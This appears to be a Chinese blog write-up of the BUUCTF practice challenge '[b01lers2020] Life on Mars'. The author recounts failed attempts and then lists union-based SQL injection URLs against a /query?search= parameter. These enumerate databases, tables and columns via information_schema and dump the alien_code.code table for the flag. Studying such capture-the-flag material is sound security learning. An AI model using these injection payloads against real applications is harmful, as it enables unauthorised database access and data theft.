当前位置: 首页 > news >正文

81,【5】BUUCTF WEB [b01lers2020]Life on Mars

进入靶场

怎莫颠颠的,一下子就想到展博了

先把左边的挨个点一遍

在最后一个有点收获

 不过也没其他收获了

这种进去给个正常网页的题目,基本都靠url获取信息了

抓包看看有没有其他信息

竟然没有任何信息

自闭了

看别人的wp去咯

为什么别人抓到的包里面有get传参的内容,我啥也没有,怎么点也没有

???????

无所谓,我会自己加

query?search=hesperia_planum& 

直接无响应了

还少个cookie

F12也没得到

那就先看别人的wp吧,熟悉下传参的单词,字母也好

题目的原理是很简单的SQL注入,甚至没有什么过滤

/query?search=amazonis_planitia union select 1,database()

/query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema='aliens'

/query?search=amazonis_planitia union select 1,group_concat(schema_name) from information_schema.schemata

/query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'alien_code'

/query?search=amazonis_planitia union select 1,group_concat(column_name) from information_schema.columns where table_name = 'code'

/query?search=amazonis_planitia union select 1,group_concat(code) from alien_code.code

得到flag

http://www.lryc.cn/news/526621.html

相关文章:

  • 华硕笔记本装win10哪个版本好用分析_华硕笔记本装win10专业版图文教程
  • Linux进程 -fork(初识),进程状态和进程优先级
  • 数据从前端传到后端入库过程分析
  • macOS如何进入 Application Support 目录(cd: string not in pwd: Application)
  • 第38周:猫狗识别 (Tensorflow实战第八周)
  • 【2024年华为OD机试】 (A卷,200分)- 计算网络信号、信号强度(JavaScriptJava PythonC/C++)
  • 【go语言】数组和切片
  • 2025美赛MCM数学建模A题:《石头台阶的“记忆”:如何用数学揭开历史的足迹》(全网最全思路+模型)
  • 使用 Docker Compose 一键启动 Redis、MySQL 和 RabbitMQ
  • 新增自定义数据功能|UWA Gears V1.0.7
  • docker 简要笔记
  • 在Ubuntu上使用Apache+MariaDB安装部署Nextcloud并修改默认存储路径
  • 【JavaEE】-- 计算机是如何工作的
  • 政安晨的AI大模型训练实践三:熟悉一下LF训练模型的WebUI
  • 基于微信小程序的网上订餐管理系统
  • 科技快讯 | 理想官宣:正式收费!WeChat 港币钱包拓宽商户网络;百川智能发布深度思考模型Baichuan-M1-preview
  • 【java数据结构】map和set
  • 飞牛NAS安装过程中的docker源问题
  • Linux(Centos 7.6)命令详解:dos2unix
  • Linux MySQL离线安装
  • 声明,这些内容和我无关
  • ISO:摄影中的光线敏感度密码
  • 长短期记忆网络LSTM
  • 2. 握手问题python解法——2024年省赛蓝桥杯真题
  • poi在word中打开本地文件
  • 国产编辑器EverEdit - 输出窗口
  • 整数的个数(信息学奥赛一本通-1067)
  • ios swift画中画技术尝试
  • MyBatis 写法
  • Three城市引擎地图插件Geo-3d